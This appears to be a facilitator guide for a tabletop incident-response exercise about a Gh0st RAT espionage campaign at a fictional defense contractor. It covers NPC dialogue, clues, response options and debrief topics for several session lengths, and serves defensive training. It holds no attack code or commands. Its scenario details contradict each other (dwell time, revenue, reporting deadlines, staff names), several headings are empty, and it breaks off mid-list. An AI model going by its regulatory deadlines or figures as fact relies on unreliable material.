Gh0st RAT Scenario: Advanced Corporate Espionage Campaign
Planning Resources
Scenario Details for IMs
InnovaTech Dynamics: Government Contractor Crisis During Security Clearance Review
Organization Profile
- Type: Technology consulting firm specializing in government contract management, defense systems integration, cybersecurity advisory services, and classified project support for Department of Defense, intelligence agencies, and federal civilian agencies
- Size: 450 employees including 220 systems engineers and technical consultants holding SECRET and TOP SECRET clearances supporting classified defense programs, 85 cybersecurity specialists conducting security assessments for government clients, 60 project managers coordinating multi-agency contract deliverables, 40 business development staff pursuing competitive government procurements, 25 facility security officers managing classified information protection protocols, 15 legal and compliance personnel handling federal acquisition regulations, and 5 executive leadership with Top Secret/SCI clearances
- Annual Operations: Managing $340 million in active government contracts across 28 federal agencies including Defense Department weapons systems modernization, intelligence community network security assessments, and civilian agency cloud migration projects, maintaining facility security clearance (FCL) enabling access to classified materials requiring stringent physical security controls and counterintelligence cooperation, supporting trusted relationships with 85 government client organizations where InnovaTech consultants operate on-site within secure government facilities accessing sensitive networks and classified systems, coordinating vendor portal systems managing competitive bidding for $800 million annual federal contract opportunities, and protecting intellectual property representing $120 million cumulative research investment in government technology solutions
- Current Clearance Crisis: Defense Counterintelligence and Security Agency (DCSA) conducting facility security clearance review next week—any evidence of classified information compromise triggers immediate FCL suspension halting all government contracts and $340 million annual revenue, but APT discovery threatens both security clearance preservation and contractual obligations to government clients
Key Assets & Impact
Asset Category 1: Facility Security Clearance & Government Contract Access - FCL enables $340M in classified contract work, DCSA review scheduled next week determines clearance continuation, APT compromise triggers immediate suspension halting all operations and 450-employee workforce
Asset Category 2: Trusted Client Relationships & On-Site Access - InnovaTech consultants operate within 85 government agencies with privileged network access, APT lateral movement through consulting relationships threatens client classified systems, trust damage eliminates competitive advantage in government market
Asset Category 3: National Security Obligations & Counterintelligence Cooperation - NISPOM regulations require immediate DCSA notification of security incidents, delayed reporting creates willful violation potentially triggering criminal prosecution of executives, but transparent disclosure guarantees FCL suspension and business collapse
Immediate Business Pressure
Monday Morning, 8:00 AM - Five Days Before DCSA Security Review:
Chief Security Officer David Chen discovered Ghost-RAT malware operating across InnovaTech’s corporate networks and government client environments. The APT—sophisticated remote access tool specifically targeting defense contractors—had established persistent surveillance for past nine months, compromising vendor portal credentials, monitoring classified project communications, and leveraging InnovaTech’s trusted consulting relationships to infiltrate 12 government agency networks.
DCSA facility security clearance review was scheduled Friday morning. The inspection would validate InnovaTech’s compliance with National Industrial Security Program requirements including incident reporting protocols, classified information protection measures, and counterintelligence cooperation obligations. Any evidence of security compromise would trigger immediate FCL suspension—halting all government contracts and eliminating InnovaTech’s ability to compete for federal procurements.
But NISPOM regulations required immediate incident notification to DCSA within 24 hours of discovery—creating impossible choice between transparent reporting guaranteeing business collapse versus delayed notification preserving clearance review but creating willful violation potentially triggering criminal prosecution.
Critical Timeline & Operational Deadlines
- Nine months ago: Ghost-RAT infiltration via compromised government vendor portal credentials
- Monday, 8:00 AM (Session Start): APT discovery five days before DCSA clearance review
- Tuesday (24 hours): NISPOM incident reporting deadline to DCSA
- Friday, 9:00 AM: DCSA facility security clearance review determining FCL continuation
- Post-discovery: Government client notification obligations, potential lateral compromise across 12 agencies
Cultural & Organizational Factors
Factor 1: Government vendor portals normalized by procurement processes created trusted credential reuse across client environments
Factor 2: On-site consulting relationships required privileged network access reducing security segmentation between contractor and government systems
Factor 3: Competitive procurement pressure emphasized relationship preservation over transparent security incident disclosure
Factor 4: Facility security clearance dependency created organizational fear of DCSA reporting triggering business-ending FCL suspension
Operational Context
Government contractors operate under National Industrial Security Program regulations enforcing classified information protection through facility clearances, personnel security protocols, and mandatory counterintelligence cooperation—these requirements create legal obligations beyond commercial contract performance where national security protection takes absolute priority over business continuity or competitive positioning, with NISPOM violations potentially triggering criminal prosecution of executives and permanent FCL revocation.
Key Stakeholders
Stakeholder 1: David Chen - Chief Security Officer Stakeholder 2: Dr. Sarah Martinez - CEO Stakeholder 3: Colonel (Ret.) James Williams - VP of Government Programs Stakeholder 4: DCSA Counterintelligence Investigator
Why This Matters
You’re not just removing APT malware from government contractor networks—you’re determining whether facility security clearance preservation obligations override transparent counterintelligence cooperation when incident reporting threatens business survival for 450-employee defense consulting firm.
You’re not just protecting classified information—you’re defining whether trusted contractor relationships enable APT lateral movement across government agencies, or demonstrate that consulting firms can balance client access privileges against security isolation requirements.
IM Facilitation Notes
1. Emphasize dual stakes—$340M government contracts AND national security protection both at risk
2. Make DCSA review timing tangible—five-day window creates genuine pressure between reporting and clearance preservation
3. Use trusted consulting relationships to explore privilege abuse and lateral movement through business partnerships
4. Present APT as deliberate defense industrial base targeting exploiting vendor access privileges
5. Address government contractor responsibility balancing business survival against counterintelligence cooperation
6. Celebrate transparent DCSA reporting prioritizing national security despite business-ending FCL suspension risk
Opening Presentation
“It’s Tuesday morning at InnovaTech Dynamics, and your cybersecurity consulting firm provides critical security services to defense contractors and government agencies holding sensitive national security clearances. Your threat hunting team is investigating anomalous network behavior when they discover sophisticated remote access tools masquerading as legitimate cloud administration utilities. Further analysis reveals that attackers have maintained persistent access for months, systematically targeting intellectual property, classified project data, and sensitive client information. Unknown to your team, the attackers are using living-off-the-land techniques and legitimate cloud services, making detection extremely difficult while conducting long-term corporate espionage that could compromise national security projects.”
Initial Symptoms to Present:
Key Discovery Paths:
Detective Investigation Leads:
Protector System Analysis:
Tracker Network Investigation:
Communicator Stakeholder Interviews:
Mid-Scenario Pressure Points:
- Hour 1: Defense contractor discovers evidence their classified project data was accessed through InnovaTech network
- Hour 2: Federal investigators question security clearance status as investigation reveals multi-month espionage campaign
- Hour 3: Additional clients reporting suspicious activity suggesting lateral movement through consulting relationships
- Hour 4: Security clearance authority reviewing government contract eligibility due to data breach implications
Evolution Triggers:
- If response is delayed, attackers may complete systematic theft of all government and defense contractor intellectual property
- If containment fails, client network compromises may result in national security implications and contract cancellations
- If federal coordination is inadequate, security clearance revocations could end government consulting business
Resolution Pathways:
Technical Success Indicators:
- Complete elimination of persistent adversary access using advanced threat hunting techniques
- Client network security assessment confirming no lateral movement to government contractors
- Enhanced security monitoring preventing future living-off-the-land attack techniques
Business Success Indicators:
- Government contracts maintained through transparent incident response and federal coordination
- Client relationships preserved through proactive notification and security remediation support
- Security clearances protected demonstrating appropriate national security incident management
Learning Success Indicators:
- Team understands advanced persistent threat techniques and living-off-the-land detection
- Participants recognize corporate espionage targeting and intellectual property protection requirements
- Group demonstrates incident response coordinating with federal investigators and security clearance authorities
Common IM Facilitation Challenges:
If Government Security Implications Are Underestimated:
“Your threat hunting is excellent, but Amanda just received a call from federal investigators. Classified project data may have been stolen, and your security clearances are under review. How does national security context change your response?”
If Client Lateral Movement Is Ignored:
“While removing persistent access from your network, Ryan discovered evidence attackers moved laterally to defense contractor client networks through trusted relationships. How do you handle client compromise through your consulting access?”
If Living-Off-The-Land Techniques Are Missed:
“Michael found that attackers are using legitimate cloud services and administrative tools, evading traditional detection. How do you identify and remove threats that look like normal operations?”
Success Metrics for Session:
Template Compatibility
Quick Demo (35-40 min)
- Rounds: 1
- Actions per Player: 1
- Investigation: Guided
- Response: Pre-defined
- Focus: Use the “Hook” and “Initial Symptoms” to quickly establish corporate espionage crisis. Present the “Guided Investigation Clues” at 5-minute intervals. Offer the “Pre-Defined Response Options” for the team to choose from. Quick debrief should focus on recognizing APT techniques and government security implications.
Lunch & Learn (75-90 min)
- Rounds: 2
- Actions per Player: 2
- Investigation: Guided
- Response: Pre-defined
- Focus: This template allows for deeper exploration of corporate espionage and government contract security challenges. Use the full set of NPCs to create realistic federal investigation and security clearance pressures. The two rounds allow discovery of client lateral movement and classified data theft, raising stakes. Debrief can explore balance between incident response and national security coordination.
Full Game (120-140 min)
- Rounds: 3
- Actions per Player: 2
- Investigation: Open
- Response: Creative
- Focus: Players have freedom to investigate using the “Key Discovery Paths” as IM guidance. They must develop response strategies balancing threat hunting, client relationship protection, federal coordination, and security clearance maintenance. The three rounds allow for full narrative arc including APT discovery, client compromise assessment, and national security implications.
Advanced Challenge (150-170 min)
- Rounds: 3
- Actions per Player: 2
- Investigation: Open
- Response: Creative
- Complexity: Add red herrings (e.g., legitimate cloud administration causing false positives). Make containment ambiguous, requiring players to justify federal notification decisions with incomplete forensic evidence. Remove access to reference materials to test knowledge recall of APT behavior and government security principles.
Quick Demo Materials (35-40 min)
Guided Investigation Clues
Clue 1 (Minute 5): “Threat hunting reveals sophisticated remote access tools masquerading as legitimate cloud administration utilities in InnovaTech Dynamics’ network. Digital forensics show persistent adversary presence using living-off-the-land techniques including PowerShell, WMI, and legitimate cloud services. Data access patterns indicate systematic targeting of intellectual property, defense contractor project data, and government security clearance information.”
Clue 2 (Minute 10): “Network analysis discovers attackers maintained persistent access for months through compromised vendor portal used for government contract bidding. Command and control communications use legitimate cloud services making detection extremely difficult. Timeline shows systematic theft of classified project information affecting defense contractors and government agencies with sensitive security clearances.”
Clue 3 (Minute 15): “Defense contractor reports suspicious activity suggesting lateral movement through InnovaTech’s trusted consulting relationships. Federal investigators questioning security clearance status as evidence reveals multi-month corporate espionage campaign targeting national security projects. Security assessment shows client networks potentially compromised through consulting firm access requiring coordinated incident response with government oversight.”
Pre-Defined Response Options
Option A: Complete Threat Hunting & Federal Coordination
- Action: Conduct comprehensive threat hunting eliminating all persistent adversary access, coordinate with federal investigators about classified data exposure, immediately notify all defense contractor and government clients, implement enhanced security monitoring preventing living-off-the-land techniques.
- Pros: Completely eliminates advanced persistent threat presence; demonstrates responsible national security incident management; maintains government contracts through transparent federal coordination.
- Cons: Comprehensive threat hunting requires extensive time affecting consulting operations; federal investigation may result in temporary security clearance suspension; client notifications may damage business relationships.
- Type Effectiveness: Super effective against APT malmon type; complete adversary removal prevents continued corporate espionage and intellectual property theft.
Option B: Targeted Remediation & Client Security Assessment
- Action: Remediate confirmed compromised systems, conduct targeted client network security assessments, selectively notify clients with confirmed data exposure, coordinate selective federal reporting while maintaining business operations.
- Pros: Allows continued government consulting operations during investigation; protects key client relationships through targeted notification; enables focused security response.
- Cons: Risks continued adversary presence in undetected locations; selective federal coordination may violate security clearance obligations; client trust damaged if lateral movement discovered later.
- Type Effectiveness: Moderately effective against APT threats; reduces but doesn’t eliminate persistent access; delays complete corporate espionage remediation.
Option C: Business Continuity & Phased Security Response
- Action: Implement emergency secure consulting operations for government contracts, phase threat hunting by client priority, establish enhanced monitoring while investigating full compromise scope, coordinate gradual federal notification.
- Pros: Maintains critical government consulting revenue during incident response; protects security clearances through continued operations; enables controlled client communication.
- Cons: Phased approach extends adversary presence timeline; emergency operations may not prevent continued espionage; gradual notification delays may violate federal coordination requirements.
- Type Effectiveness: Partially effective against APT malmon type; prioritizes business continuity over complete threat elimination; doesn’t guarantee corporate espionage cessation.
Lunch & Learn Materials (75-90 min, 2 rounds)
Round 1: Advanced Persistent Threat Discovery (40-45 min)
Investigation Clues (Time-Stamped)
T+0 (Round Start):
- Detective (Digital Forensics): “Email forensics reveal sophisticated remote access tools disguised as legitimate cloud administration utilities installed via compromised vendor portal credentials. The malware is using PowerShell and WMI for living-off-the-land techniques, making detection extremely difficult. Evidence suggests persistent presence for 4+ months.”
- Protector (Endpoint Security): “Endpoint analysis shows multiple workstations with modified legitimate administrative tools. Network segmentation reveals lateral movement through trusted consulting relationships to client environments. Defense contractor client networks show suspicious activity patterns matching InnovaTech access timelines.”
- Tracker (Network Analysis): “Command and control traffic is tunneling through legitimate cloud services (Azure, AWS) making detection nearly impossible with traditional methods. Behavioral analysis shows systematic targeting of intellectual property, classified project data, and security clearance information during business hours.”
- Communicator (Stakeholder Coordination): “Security Director Foster reports federal investigators have been contacted due to classified project involvement. Defense contractor clients are demanding immediate briefing. Compliance Manager Torres warns any breach notification could trigger security clearance review affecting government contracts.”
T+15 (Mid-Round Pressure):
- NPC Event - Principal Consultant Chen: “Michael discovered that attackers compromised the vendor portal used for government contract bidding three months ago. They’ve been using legitimate cloud management tools to maintain access across multiple client environments through our trusted consulting relationships.”
- Pressure Event: Defense contractor client calls asking why their classified network security logs show InnovaTech access during non-business hours. They’re threatening to suspend the consulting contract pending investigation.
T+25 (Round Transition Setup):
- Detective Discovery: “Timeline analysis confirms attackers used vendor portal compromise to establish initial access, then deployed sophisticated RAT disguised as cloud administration tools. They’ve been systematically exfiltrating data from classified government projects.”
- Critical Decision Point: Team must decide whether to immediately notify all defense contractor clients about potential compromise, risking government contract cancellations, or conduct targeted assessment first.
Response Options for Round 1
Option A: Immediate Federal Coordination & Client Notification
- Action: Contact federal investigators immediately, notify all defense contractor and government clients about potential compromise, begin comprehensive threat hunting across consulting firm and client environments.
- Pros: Demonstrates responsible national security incident management; maintains trust through transparency; ensures proper federal coordination for classified data exposure.
- Cons: Immediate client notification may trigger multiple contract cancellations; federal investigation could suspend security clearances; comprehensive threat hunting disrupts consulting operations.
- Type Effectiveness: Super effective against APT - establishes proper federal oversight and client protection.
- Consequences: Leads to Round 2 with federal investigators actively involved, some clients demanding immediate remediation, security clearances under review.
Option B: Targeted Assessment Before Broad Notification
- Action: Conduct rapid targeted assessment of client compromise scope, coordinate with federal investigators before broad notification, prioritize defense contractor clients with classified project exposure.
- Pros: Allows evidence gathering before notifications; protects key client relationships through informed communication; enables focused federal coordination.
- Cons: Delays may violate security clearance obligations; risks additional data theft during assessment; clients may discover compromise independently.
- Type Effectiveness: Moderately effective against APT - balances investigation with notification requirements.
- Consequences: Leads to Round 2 with partial client notifications, increased federal pressure for complete disclosure, risk of independent discovery by clients.
Option C: Emergency Secure Operations & Phased Response
- Action: Implement emergency secure consulting environment for critical government projects, phase threat hunting by client classification level, establish enhanced monitoring while coordinating gradual federal notification.
- Pros: Maintains critical government consulting revenue; protects highest-risk classified projects first; enables controlled communication timing.
- Cons: Phased approach extends remediation timeline; emergency operations may not prevent continued espionage; selective notification may violate federal requirements.
- Type Effectiveness: Partially effective against APT - prioritizes business continuity over complete federal coordination.
- Consequences: Leads to Round 2 with business operations continuing but federal investigators questioning notification delays, increased risk of security clearance violations.
Facilitation Questions for Round 1
- “How do living-off-the-land techniques using legitimate cloud services challenge traditional malware detection?”
- “What are the national security implications of corporate espionage targeting defense contractor consulting relationships?”
- “How should incident response balance federal coordination requirements with business relationship protection?”
- “What makes vendor portal compromises particularly dangerous for trusted third-party consulting firms?”
Round 1 Transition Narrative
Based on team’s chosen response option:
If Option A chosen: “Your immediate federal notification and client communication triggers intensive scrutiny. The Defense Security Service launches formal investigation of InnovaTech’s security clearance eligibility. Three defense contractor clients demand immediate on-site remediation. Federal investigators need complete forensic evidence while attackers may still be active in client environments you haven’t yet assessed.”
If Option B chosen: “Your targeted assessment reveals that attackers established persistent access in at least four defense contractor client networks through InnovaTech’s trusted consulting relationships. Federal investigators are demanding complete client notification within 24 hours. One client independently discovered suspicious activity and is now questioning why they weren’t notified immediately.”
If Option C chosen: “Your emergency secure operations prevent immediate contract cancellations, but federal investigators arrive demanding explanation for notification delays. The Defense Security Service questions whether phased approach violates security clearance obligations. Meanwhile, threat hunting reveals attackers are still active in several client environments you haven’t yet secured.”
Round 2: Client Lateral Movement & Security Clearance Crisis (35-45 min)
Investigation Clues (Time-Stamped)
T+0 (Round Start - Building on Round 1 outcome):
- Detective (Threat Hunting): “Comprehensive forensic analysis reveals attackers used InnovaTech’s trusted consulting access to move laterally into six defense contractor client networks. They specifically targeted classified project data, including next-generation weapons system designs, cryptographic protocols, and security clearance databases.”
- Protector (Client Security Assessment): “Client environment analysis shows sophisticated persistence mechanisms across multiple defense contractor networks. Attackers established backup access methods anticipating primary RAT detection. Some classified project data was exfiltrated to foreign intelligence infrastructure.”
- Tracker (Attribution Analysis): “Command and control infrastructure analysis reveals nation-state or state-sponsored capabilities. The targeting pattern, operational security, and technical sophistication suggest advanced persistent threat with specific intelligence collection objectives focused on defense industrial base.”
- Communicator (Federal Coordination): “Defense Security Service formally reviewing InnovaTech’s security clearances for all personnel with classified access. FBI counterintelligence division investigating potential espionage affecting national security. Multiple defense contractor clients demanding immediate on-site remediation and financial compensation for breach.”
T+15 (Mid-Round Pressure):
- NPC Event - Compliance Manager Torres: “Jennifer reports that the security clearance review could result in suspension of all classified project access within 48 hours unless we demonstrate complete adversary removal and enhanced security controls. Loss of clearances would end our government consulting business entirely.”
- Pressure Event: Lead defense contractor client discovers classified weapons system data on foreign intelligence network, confirming exfiltration through InnovaTech compromise. They’re threatening legal action and demanding immediate termination of consulting relationship.
T+25 (Round Transition Setup):
- Critical Business Decision: Security clearance suspension would eliminate 70% of company revenue. Team must balance complete threat remediation with business survival while maintaining federal coordination.
- Technical Challenge: Removing persistent access from client environments requires coordinating with six different defense contractor security teams, each with different security requirements and operational constraints.
Response Options for Round 2
Option A: Complete Client Remediation & Security Clearance Demonstration
- Action: Deploy comprehensive threat hunting teams to all six defense contractor client networks, coordinate synchronized adversary removal across all environments, implement enhanced security controls demonstrating security clearance compliance, provide complete forensic evidence to federal investigators.
- Pros: Demonstrates complete threat elimination to Defense Security Service; maintains security clearances through responsible remediation; preserves critical client relationships through proactive security response.
- Cons: Comprehensive multi-client remediation requires massive resource investment; some clients may refuse access for coordinated response; federal investigation may still suspend clearances during assessment.
- Type Effectiveness: Super effective against APT - complete removal across all environments with federal oversight.
- Business Impact: High short-term cost but preserves government consulting business and security clearances.
Option B: Prioritized Client Security & Federal Evidence Coordination
- Action: Focus threat hunting on clients with confirmed classified data exfiltration, coordinate targeted forensic evidence for federal investigation, implement enhanced monitoring for remaining clients while phasing full remediation, negotiate security clearance conditional approval during remediation.
- Pros: Concentrates resources on highest-risk client environments; provides federal investigators with detailed evidence; enables continued business operations during phased remediation.
- Cons: Phased approach may leave some client environments compromised; federal investigators may demand complete remediation before clearance approval; clients without immediate remediation may terminate contracts.
- Type Effectiveness: Moderately effective against APT - addresses confirmed compromises but may miss hidden persistence.
- Business Impact: Moderate cost, maintains some government consulting operations, risk of partial clearance suspension.
Option C: Business Survival & Minimum Viable Remediation
- Action: Remediate only InnovaTech internal environment completely, provide clients with detection signatures and remediation guidance for their own networks, coordinate minimum viable evidence for federal investigation, negotiate clearance retention through enhanced monitoring and security controls.
- Pros: Minimizes immediate remediation costs; maintains business operations; transfers client remediation responsibility to affected organizations.
- Cons: Clients may view approach as negligent; federal investigators unlikely to approve clearance retention with incomplete client remediation; risks continued espionage in client environments.
- Type Effectiveness: Partially effective against APT - remediates consulting firm but not client lateral movement.
- Business Impact: Low immediate cost but high risk of clearance suspension and client contract terminations.
Facilitation Questions for Round 2
- “How does trusted third-party access create unique lateral movement risks in defense contractor environments?”
- “What are the security clearance implications when a consulting firm’s compromise leads to client classified data theft?”
- “How should organizations balance business survival with complete threat remediation in national security contexts?”
- “What makes coordinated multi-organization threat hunting particularly challenging in defense industrial base?”
Victory Conditions for Lunch & Learn
Technical Victory:
- Complete removal of persistent adversary access from InnovaTech and confirmed compromised client environments
- Enhanced security monitoring preventing future living-off-the-land techniques
- Coordinated threat intelligence sharing with defense industrial base security community
Business Victory:
- Security clearances maintained through demonstrated complete threat remediation
- Critical defense contractor relationships preserved through transparent communication and proactive security response
- Government consulting business continuity through federal coordination and compliance demonstration
Learning Victory:
- Team understands advanced persistent threat techniques including living-off-the-land and cloud service abuse
- Participants recognize trusted third-party risks and lateral movement through consulting relationships
- Group demonstrates incident response coordinating with federal investigators, defense contractors, and security clearance authorities
Debrief Topics
- Living-Off-The-Land Techniques: How do attackers abuse legitimate administrative tools to evade detection?
- Trusted Third-Party Risk: What makes vendor and consulting firm compromises particularly dangerous for clients?
- Security Clearance Obligations: How do federal security clearance requirements affect incident response for government contractors?
- Lateral Movement Detection: What behavioral indicators reveal movement through trusted relationships?
- Federal Coordination: How should organizations coordinate with FBI, Defense Security Service, and affected clients?
- Business Continuity Balance: When do security clearance obligations require prioritizing complete remediation over business survival?
Full Game Materials (120-140 min, 3 rounds)
Round 1: Initial APT Discovery & Vendor Portal Compromise (35-40 min)
Open Investigation (Player-Driven)
Available Evidence (Players must ask to investigate):
- Email logs: Show vendor portal password reset requests with suspicious timing
- Network traffic: Reveals persistent connections to cloud services with unusual data volumes
- Endpoint forensics: Modified PowerShell execution policies and WMI subscriptions
- Client communications: Recent questions about InnovaTech access during non-business hours
- Vendor portal logs: Multiple successful authentications from unusual geographic locations
- Cloud service audit logs: Administrative actions that don’t match employee schedules
Role-Specific Investigation Paths:
- Detective: Can pursue digital forensics, malware analysis, vendor portal compromise timeline, or email attack vectors
- Protector: Can investigate endpoint security, network segmentation, client environment assessment, or access control analysis
- Tracker: Can analyze command and control infrastructure, cloud service abuse patterns, adversary tradecraft, or attribution indicators
- Communicator: Can interview employees about suspicious emails, coordinate with vendor portal provider, assess federal notification requirements, or evaluate client communication strategy
NPC Interactions (Players must initiate)
Security Director Amanda Foster (Former NSA):
- Available for federal coordination guidance, security clearance implications, threat hunting strategy
- If asked about federal requirements: “Given our classified project involvement, we have mandatory reporting obligations to Defense Security Service within 72 hours of confirmed compromise. Any delay could jeopardize our clearances.”
- If asked about business impact: “We have $45 million in active government contracts. Security clearance suspension would essentially end our government consulting business. But national security comes first.”
Principal Consultant Michael Chen (Cloud Architecture):
- Available for cloud service analysis, legitimate tool identification, client environment assessment
- If asked about cloud activity: “These administrative actions look legitimate on the surface - Azure AD management, AWS resource monitoring. But the timing and data volumes don’t match our actual operations. Someone’s using our cloud infrastructure for cover.”
- If asked about client impact: “We have administrative access to six defense contractor client networks for security consulting. If attackers got our credentials, they could have moved laterally to classified environments.”
Compliance Manager Jennifer Torres (Security Clearances):
- Available for federal reporting requirements, security clearance obligations, client notification protocols
- If asked about notification timing: “Defense Security Service requires notification within 72 hours, but FBI counterintelligence may want us to delay client notification for investigation purposes. We’re in a complex regulatory position.”
- If asked about clearance risk: “If federal investigators determine we had inadequate security for classified data access, every employee with a clearance could face suspension or revocation. That’s our entire senior consulting staff.”
Lead Engineer Ryan Park (Threat Hunting):
- Available for technical analysis, detection methodology, persistence mechanism identification
- If asked about detection challenges: “Living-off-the-land techniques are designed to blend with legitimate operations. They’re using PowerShell, WMI, and cloud services we use every day. Traditional signature-based detection is useless here.”
- If asked about scope assessment: “Based on the persistence mechanisms I’m finding, attackers have been here for months. They’ve had time to exfiltrate everything - client data, classified projects, intellectual property.”
Pressure Events (Timed Throughout Round)
T+10: Defense contractor client emails asking why InnovaTech credentials accessed their classified network at 3 AM last Tuesday. They’re requesting immediate explanation.
T+20: Vendor portal provider confirms unauthorized access to InnovaTech account credentials three months ago. They ask if InnovaTech wants to file law enforcement report.
T+30: IT monitoring detects active data exfiltration to cloud storage service. Someone is currently stealing data in real-time.
Round 1 Response Development
Players must develop response addressing:
- Immediate containment: How to stop active data exfiltration without alerting attackers
- Federal notification: When and how to notify Defense Security Service and FBI
- Client communication: What to tell defense contractor clients and when
- Scope assessment: How to determine full extent of compromise across consulting firm and client environments
- Business continuity: How to maintain government consulting operations during investigation
No pre-defined options - players must justify their approach
Round 1 Transition (Based on Player Decisions)
IM evaluates player response and introduces consequences:
- If federal notification delayed: Defense Security Service discovers compromise independently, questions clearance eligibility
- If immediate client notification: Some clients terminate contracts, others demand on-site remediation
- If containment inadequate: Attackers detect investigation and establish additional backup persistence
- If scope assessment incomplete: Round 2 reveals client lateral movement was worse than initially assessed
Round 2: Client Lateral Movement & Classified Data Theft (40-45 min)
Evolving Situation (Based on Round 1)
New Evidence Available:
- Complete vendor portal compromise timeline showing three-month adversary presence
- Client network logs revealing lateral movement through InnovaTech trusted access
- Classified project data found on foreign intelligence infrastructure (from FBI counterintelligence)
- Defense Security Service formal investigation notice regarding security clearance review
- Additional defense contractor clients reporting suspicious InnovaTech access patterns
Escalating Pressure:
- Business Crisis: Three major clients suspend contracts pending investigation ($18M annual revenue)
- Federal Investigation: FBI counterintelligence treating case as potential espionage affecting national security
- Security Clearance: Defense Security Service reviewing clearance eligibility for all InnovaTech personnel with classified access
- Technical Challenge: Attackers established sophisticated persistence across six different client environments
Open Investigation Continues
Additional Investigation Paths:
- Client Environment Forensics: Assess lateral movement extent and data theft across six defense contractor networks
- Attribution Analysis: Determine adversary capabilities, motivations, and potential nation-state sponsorship
- Persistence Mechanisms: Identify all backup access methods and hidden persistence techniques
- Data Exfiltration Analysis: Determine what classified information was stolen and from which clients
NPC Developments
Security Director Foster - Federal Coordination Crisis:
- “FBI counterintelligence wants us to delay comprehensive client notification to preserve investigation. But Defense Security Service says we’re violating clearance obligations by not immediately disclosing to all affected clients. I need guidance on how to navigate conflicting federal requirements.”
Principal Consultant Chen - Client Remediation Complexity:
- “Each defense contractor client has different security requirements, operational constraints, and remediation expectations. Some want us on-site immediately, others won’t give us access until federal investigation completes. Coordinating synchronized threat hunting across six different organizations is nearly impossible.”
Compliance Manager Torres - Clearance Suspension Imminent:
- “Defense Security Service just sent formal notice: Unless we demonstrate complete adversary removal and enhanced security controls within 48 hours, they’re suspending all classified access for InnovaTech personnel. That would effectively end our government business.”
Lead Engineer Park - Persistence Sophistication:
- “These attackers anticipated detection. They established multiple backup persistence mechanisms across client environments - WMI event subscriptions, scheduled tasks, modified legitimate tools. Removing them requires coordinating with each client’s security team to avoid disrupting their operations.”
Pressure Events Round 2
T+10: Major defense contractor discovers classified weapons system designs on foreign intelligence network. Their forensics confirms exfiltration through InnovaTech compromise. They’re threatening legal action.
T+25: Defense Security Service accelerates clearance review timeline. They want evidence of complete threat remediation within 24 hours, not 48.
T+35: Two additional defense contractor clients independently discover suspicious InnovaTech access patterns. They’re demanding immediate explanation and threatening contract termination.
Round 2 Response Development
Players must address:
- Client Remediation Strategy: How to coordinate threat hunting across six different defense contractor environments
- Federal Coordination: How to balance FBI investigation preservation with Defense Security Service notification obligations
- Security Clearance Demonstration: What evidence will prove complete threat remediation to federal investigators
- Business Survival: How to maintain government consulting operations while addressing multi-client breach
- Resource Allocation: Limited threat hunting resources across multiple client environments with competing demands
Round 2 Transition
IM evaluates client remediation strategy and introduces Round 3 setup:
- Assessment of threat hunting effectiveness across client environments
- Federal investigator response to coordination approach
- Security clearance review decision based on demonstrated remediation
- Client relationship outcomes based on communication and response quality
Round 3: Security Clearance Review & Business Recovery (40-55 min)
Final Crisis Resolution
Situation Status:
- Federal investigation reaching conclusion - final evidence needed
- Security clearance decision imminent - demonstration of enhanced security required
- Client relationships at critical juncture - remediation quality determines future business
- Adversary persistence status - have all access methods been eliminated?
New Developments:
- Defense Security Service: Final clearance review hearing scheduled - must demonstrate complete security improvement
- FBI Counterintelligence: Attribution confirmed as nation-state APT - broader defense industrial base warning needed
- Client Coordination: Some clients demanding financial compensation, others requesting enhanced security consulting
- Threat Intelligence: Security community identifies InnovaTech compromise as part of broader defense contractor campaign
Final Investigation & Response
Critical Questions Players Must Answer:
- Complete Threat Elimination: How do you verify all adversary persistence removed from consulting firm and client environments?
- Enhanced Security Demonstration: What security improvements prove to Defense Security Service that future compromises are prevented?
- Client Relationship Recovery: How do you rebuild trust with defense contractor clients after compromising their classified environments?
- Business Continuity: What’s the path to maintain government consulting business and security clearances?
- Community Coordination: How do you share threat intelligence with broader defense industrial base without damaging reputation?
NPC Final Positions
Security Director Foster - Federal Testimony:
- “I’m testifying at the clearance review hearing tomorrow. I need to present a complete narrative: how we detected the APT, coordinated with federal investigators, remediated all client environments, and implemented enhanced security. Our government business depends on this testimony being convincing.”
Principal Consultant Chen - Client Recovery Strategy:
- “Some clients view us as victims of sophisticated nation-state attack. Others see negligent security that compromised their classified projects. We need differentiated strategies for relationship recovery based on each client’s perspective and damage level.”
Compliance Manager Torres - Clearance Decision Framework:
- “Defense Security Service will base clearance decision on three factors: complete threat remediation, enhanced security controls, and demonstrated commitment to federal coordination. We need concrete evidence for all three, not just promises.”
Lead Engineer Park - Threat Intelligence Sharing:
- “FBI wants us to share detailed attack indicators with other defense contractors through Defense Industrial Base Collaborative Information Sharing Environment. But some clients worry that publicizing our compromise damages our reputation. How do we balance community security with business interests?”
Final Pressure Events
T+15: Defense Security Service requests final evidence submission for clearance review. They specifically want: complete forensic timeline, all client remediation verification, enhanced security architecture, and future prevention controls.
T+30: Major client that initially threatened legal action approaches with different proposal: Instead of termination, they want InnovaTech to lead enhanced security consulting engagement for their entire defense contractor network. This could be business recovery or reputational risk.
T+40: FBI counterintelligence confirms broader APT campaign targeting at least twelve other defense consulting firms. Industry coordination meeting scheduled tomorrow - InnovaTech invited to present lessons learned. This is opportunity for thought leadership or admission of security failures.
Victory Conditions for Full Game
Technical Victory:
- Complete documented removal of all adversary persistence from InnovaTech and six client environments
- Enhanced security architecture preventing future living-off-the-land attacks and vendor portal compromises
- Threat intelligence contribution to defense industrial base community security
Business Victory:
- Security clearances maintained through demonstrated federal coordination and security improvement
- Majority of defense contractor client relationships preserved or recovered
- Government consulting business continuity with enhanced security positioning
Learning Victory:
- Team demonstrates sophisticated understanding of APT techniques, living-off-the-land detection, and cloud service abuse
- Participants navigate complex federal coordination between FBI counterintelligence and Defense Security Service
- Group balances business survival with national security obligations and client relationship management
- Understanding of trusted third-party risks and lateral movement through consulting relationships
Debrief Topics
- Advanced Persistent Threat Evolution: How have APTs evolved from traditional malware to living-off-the-land techniques?
- Cloud Service Security: What makes legitimate cloud service abuse particularly difficult to detect and prevent?
- Vendor Portal Risk: Why are third-party portals such attractive targets for supply chain attacks?
- Federal Coordination Complexity: How do organizations navigate conflicting requirements from different federal agencies?
- Security Clearance Obligations: What are the incident response implications of holding government security clearances?
- Trusted Third-Party Lateral Movement: How should consulting firms protect both their own and client environments?
- Business Continuity Ethics: When do national security obligations require prioritizing security over business survival?
- Threat Intelligence Sharing: How can compromised organizations contribute to community security despite reputational concerns?
Advanced Challenge Materials (150-170 min, 3+ rounds)
Advanced Challenge Modifications
Complexity Additions:
- Conflicting Federal Requirements:
